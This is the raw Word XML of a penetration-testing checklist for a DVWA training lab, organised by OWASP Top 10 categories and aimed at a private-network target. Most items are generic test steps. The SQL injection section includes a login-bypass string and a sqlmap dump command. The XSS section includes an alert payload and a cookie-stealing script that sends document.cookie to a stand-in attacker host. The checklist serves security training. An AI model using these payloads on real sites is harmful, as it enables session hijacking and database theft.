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96223" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t>Web Application Security Testing Checklist (DVWA Lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B05C1BA" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="1FCD1A48" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:r w:rsidRPr="00060EDA">
        <w:t>Target: http://192.168.1.200</w:t>
      </w:r>
      <w:r w:rsidRPr="00060EDA">
        <w:br/>
        <w:t xml:space="preserve">Objective: Identify vulnerabilities based on </w:t>
      </w:r>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75F3D5" w14:textId="67FE83D5" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="3A17E448" w14:textId="2D61A929" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Injection Testing (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D76F2" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Identify input fields (login, search, URL params) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9051E" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test basic payloads: ' OR 1=1-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16763C9F" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve"> for automated testing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510068BE" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">sqlmap -u http://192.168.1.200/login --forms --dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF17B8" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check for database extraction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDA764" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify error-based / blind SQLi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B6DFC" w14:textId="3FEFA7A0" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="0F874167" w14:textId="109B69FF" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4D2A0" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test input fields for reflected XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F712588" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Payload: &lt;script&gt;alert(1)&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9B158" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test stored XSS (comments/forms) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D535C4" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test DOM-based XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C6DE8" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Attempt cookie/session theft </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E911E9E" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Payload: &lt;script&gt;document.location='http://attacker.com?c='+document.cookie&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00507C3A" w14:textId="07E038CC" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="2ABA74F8" w14:textId="29049B24" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2614E7" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test default credentials (admin:admin, root:root) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCBCBC" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Attempt brute-force attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE13177" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check session management: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393392C6" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Session ID predictable? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A92892E" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Session timeout implemented? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5559F" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test login bypass techniques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD2792D" w14:textId="1086365D" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="247F609B" w14:textId="61DE3269" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9E90F" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Identify exposed services (FTP, SSH, HTTP) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225EBA9E" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check directory listing enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A14E5" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify debug/error messages leakage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14705256" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check default configurations (Apache, Tomcat) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413691C" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test unnecessary open ports </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7287148C" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="0789A91A" w14:textId="64036D5A" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Vulnerable &amp; Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728F5E7" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Identify software versions: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E863F" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Web server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020E4DE" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F90B84" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">CMS/Framework </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B8BF6" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check for known CVEs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18754160" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify if OS is end-of-life (EOL) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6559ADA7" w14:textId="2124A102" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="3C67DF32" w14:textId="10B61A6E" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Identification &amp; Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA60D8" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test weak passwords </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75923CF2" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check password policy enforcement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06390122" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify account lockout mechanism </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED3A82" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test password reset functionality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA802A" w14:textId="2142F7AE" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="1543BD87" w14:textId="42DD94D4" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Software &amp; Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA9798" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check for backdoors or malicious services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11267ADD" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify file upload restrictions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C441F32" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Test integrity of application components </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D6967" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Look for insecure update mechanisms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE771B7" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="23FC2A0B" w14:textId="70ACCAA8" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5A477" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check if HTTP is used instead of HTTPS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3331C" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Identify cleartext credential transmission </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C96C2" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify weak encryption usage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA0654C" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test sensitive data exposure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB35EF" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="24471CCD" w14:textId="5D02357F" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Security Logging &amp; Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57289999" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check if login attempts are logged </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99541B" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Verify alerting mechanisms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C5B43" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test detection of brute-force attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A85EFCF" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Review log visibility for admins </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4DA333" w14:textId="54C9FC42" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA"/>
    <w:p w14:paraId="107AD4EA" w14:textId="7C753D7D" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Server-Side Vulnerabilities (RCE / SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346D260" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Test file inclusion vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F017DA5" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Check for command injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E1BCD" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Identify exposed services (Tomcat, APIs) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD60CB" w14:textId="77777777" w:rsidR="00060EDA" w:rsidRPr="00060EDA" w:rsidRDefault="00060EDA" w:rsidP="00060EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00060EDA">
        <w:t xml:space="preserve">Attempt remote code execution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCCF3B" w14:textId="77777777" w:rsidR="00D57398" w:rsidRDefault="00D57398"/>
    <w:sectPr w:rsidR="00D57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3F25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48BE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F4219"/>
